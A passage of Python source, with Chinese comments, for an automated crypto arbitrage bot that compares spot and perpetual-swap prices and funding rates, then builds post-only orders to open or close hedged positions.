'predict_funding': Necessary_info[h][
'Predict_Funding_Rate'],
'present_funding': Necessary_info[h][
'Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# 平负仓
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif swap_mark_price < spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
#让平仓增加2倍难度
if Sc/2 > Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# print(funding_rate_result['fundingRate'])
# print(float(funding_rate_result['nextFundingRate']))
if float(funding_rate_result['fundingRate']) > 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) > 0.001:
pass
else:
# 平均资金费率要大于万三
if abs(Necessary_info[h]['Present_Funding_Rate']) > 0.0003:
mode_close_long_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# 平正仓
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
# print('close_long_mode_12',close_long_mode)
# print('close_long_final_open_mode_12',close_long_final_open_mode)
# print('close_long_final_close_mode_12',close_long_final_close_mode)
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
if Sc > -1 * Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# 如果目前资金费率>0,且加上下期资金费率大于正千一,就不要开负仓
if float(funding_rate_result['fundingRate']) > 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) > 0.001:
pass
else:
#print('xc')
# 查询开负仓还有多少可开
max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
time.sleep(0.1)
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
if abs(float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate'])) < 0.05 /100 /3: # 借币日利率假定万五然后除3,因为分三次小时
# 小于的话就不要开仓,抵不过借币日利率
Target_Amount = abs(Operation_info[h]['spot_balance'])
elif max_avail_size_result < spot_size:
# TA就等于目前的spot_balance然后不要增加
Target_Amount = abs(Operation_info[h]['spot_balance']) # 因为在def会*-1,所以这里加上abs
else:
pass # 照常通过,继续开spot负仓
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# 开负仓
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
#print('here_ck')
#print('open_short_mode_23',open_short_mode)
if open_long_mode =='on' or open_long_final_open_mode=='on' or open_long_final_close_mode=='on' or open_short_mode=='on' or \
open_short_final_open_mode =='on' or open_short_final_close_mode =='on' or close_short_mode =='on' or\
close_short_final_open_mode =='on' or close_short_final_close_mode =='on' or close_long_mode =='on' or \
close_long_final_open_mode =='on' or close_long_final_close_mode =='on' :
time.sleep(0.3)
#这里准备新的五档数据给下面下单用
# 新的swap五档
try:
Operation_info[h]['swap_depth5']=MQ[h]["DEPTH5_SWAP"].get(timeout=1)
# swap_depth5 = Operation_info[h]['swap_depth5']
except:
try:
Operation_info[h]['swap_depth5']=Operation_info[h]['swap_depth5']
# swap_depth5=Operation_info[h]['swap_depth5']
except:
Operation_info[h]['swap_depth5']=marketAPI.get_orderbook(h + '-SWAP', '5')['data']
# swap_depth5 = Operation_info[h]['swap_depth5']
time.sleep(0.1)
# 新的spot五档
try:
Operation_info[h]['spot_depth5']= MQ[h]["DEPTH5_SPOT"].get(timeout=1)
# spot_depth5 = Operation_info[h]['spot_depth5']
# print('我spot_depth5还是用ws___#')
except:
try:
Operation_info[h]['spot_depth5']= Operation_info[h]['spot_depth5']
# spot_depth5 = Operation_info[h]['spot_depth5']
except:
Operation_info[h]['spot_depth5']= marketAPI.get_orderbook(h, '5')['data']
# spot_depth5 =Operation_info[h]['spot_depth5']
print('h_',h)
print('我spot_depth5还是用restAPI___#')
time.sleep(0.1)
if open_long_mode =='on' or open_long_final_open_mode=='on' or open_long_final_close_mode=='on' or open_short_mode=='on' or open_short_final_open_mode =='on' or open_short_final_close_mode =='on':
Operation_info[h]['position_direction']='open'
elif close_short_mode =='on' or close_short_final_open_mode =='on' or close_short_final_close_mode =='on' or close_long_mode =='on' or close_long_final_open_mode =='on' or close_long_final_close_mode =='on':
Operation_info[h]['position_direction']='close'
# if h == 'MINA-USDT':
# print('h', h)
#print('swap_position',Operation_info[h]['swap_position'])
#print('contract_value',Necessary_info[h]['contract_val'])
#print('spot_balance',Operation_info[h]['spot_balance'])
# print('open_long_mode_1',open_long_mode)
# print('open_short_mode_1',open_short_mode)
# print('close_short_mode_1',close_short_mode)
# print('close_long_mode_1',close_long_mode)
# print('open_long_final_open_mode',open_long_final_open_mode)
# print('open_short_final_open_mode',open_short_final_open_mode)
# print('open_long_final_close_mode',open_long_final_close_mode)
# print('open_short_final_close_mode',open_short_final_close_mode)
# print('close_long_final_close_mode',close_long_final_close_mode)
# print('close_short_final_close_mode',close_short_final_close_mode)
# print('close_long_final_open_mode',close_long_final_open_mode)
# print('close_short_final_open_mode',close_short_final_open_mode)
#print('swap_pending_left',Operation_info[h]['swap_pending_list_left'] )
#print('spot_pending_left',Operation_info[h]['spot_pending_list_left'])
open_short_mode ='off'
open_short_final_open_mode ='off'
open_short_final_close_mode ='off'
close_long_mode ='off'
close_long_final_open_mode ='off'
close_long_final_close_mode ='off'
# open_long_mode ='off'
# open_long_final_open_mode ='off'
# open_long_final_close_mode ='off'
# close_short_mode ='off'
# close_short_final_open_mode ='off'
# close_short_final_close_mode ='off'
if open_long_mode == 'on':
if (tolerate_limit/2/swap_present_price) > Operation_info[h]['spot_balance']+ Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / 4/ swap_present_price):
# 现货仓位多于合约仓位,合约卖best价,稍微调整现货买2档
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][1][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['spot_balance']+ Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / 2 / swap_present_price):
# 现货仓位多于合约仓位,合约卖中间价,现货买五档
#处理挂单中间价的问题
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / swap_present_price):
# 现货仓位多于合约仓位,Spot_size=0, swap卖出挂买一价limit, 0607 合约卖中间价
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': '0',
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] <-1*(tolerate_limit / 4 / swap_present_price):
# 合约仓位多于现货仓位,现货买best价,合约稍微调整卖2档
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']) ,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] <-1*(tolerate_limit / 2 / swap_present_price):
# 合约仓位多于现货仓位,现货买中间价,合约卖五档
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / swap_present_price):
# 合约仓位多于现货仓位,spot买在对手价
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # 平时设置在Best
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
#print('mode_take_long_order',mode_take_long_order)
if open_short_mode == 'on': #swap是long_position,spot_balance<0
if -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / 4 / swap_present_price):
# 现货short仓位多于合约long仓位,合约买best价,现货调整卖2档
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][1][0]),Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / 2 / swap_present_price):
# 现货short仓位多于合约long仓位,合约买中间价,现货卖五档
#处理挂单中间价的问题
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_short_order = { 'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]),Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / swap_present_price):
# 现货仓位多于合约仓位,Spot_size=0, swap买入挂卖一价limit,0607swap挂中间价
#处理挂单中间价的问题
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': '0',
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / 2 / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >(tolerate_limit / 4 / swap_present_price):
# 合约仓位多于现货仓位,现货卖best价,合约调整买2档
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >(tolerate_limit / 2 / swap_present_price):
# 合约仓位多于现货仓位,现货卖中间价,合约买五档
#处理挂单中间价的问题
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] > (tolerate_limit / swap_present_price):
# 合约仓位多于现货仓位,spot卖在对手价,0607spot挂中间价
#处理挂单中间价的问题
#如果best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # 平时设置在Best,卖spot,买swap,在best价
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
#print('mode_take_short_order',mode_take_short_order)
if close_short_mode =='on': #平负仓,spot平空,swap平多.spot_balance<0,swap_position>0
if -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / 4 / swap_present_price):
# 平仓时现货仓位多于合约仓位,现货要加速平空,现货买在best价,合约调整卖在2档
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / 2 / swap_present_price):
# 平仓时现货仓位多于合约仓位,现货要加速平空,现货买在中间价,合约卖在五档
#处理挂单中间价的问题
#如果spot best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / swap_present_price): #平负仓,spot平空买入,swap平多卖出.spot_balance<0,swap_position>0
# 平仓时现货仓位多于合约仓位,spot买太慢,现货买在对手价,spot买在中间价
#如果spot best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / 2 / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] > (tolerate_limit / 4 / swap_present_price): #平负仓,spot平空买入,swap平多卖出.spot_balance<0,swap_position>0
# 平仓时合约仓位多于现货仓位,合约要加速平多,swap卖在best价,现货调整买在2档
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][1][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] > (tolerate_limit / 2 / swap_present_price): #平负仓,spot平空买入,swap平多卖出.spot_balance<0,swap_position>0
# 平仓时合约仓位多于现货仓位,合约要加速平多,swap卖在中间价,现货买在五档
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >\
(tolerate_limit / swap_present_price): #平负仓,spot平空,swap平多.spot_balance<0,swap_position>0
# 平仓时合约仓位多于现货仓位,合约要加速平多,合约卖在对手价,0607合约卖在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': '0',
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
# print('mode_take_close_short_order',mode_take_close_short_order)
else: # 平时设置在best,spot平空买入,swap平多卖出
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
if close_long_mode =='on':
if (tolerate_limit / 4 / swap_present_price) > Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / 4 / swap_present_price):
#spot平多,swap平空,spot_balance>0,swap_position<0
# 平仓时现货仓位多于合约仓位,现货要加速平多,现货卖best价,合约调整买2档
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / 2 / swap_present_price):
#spot平多,swap平空,spot_balance>0,swap_position<0
# 平仓时现货仓位多于合约仓位,现货要加速平多,现货卖中间价,合约买五档
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
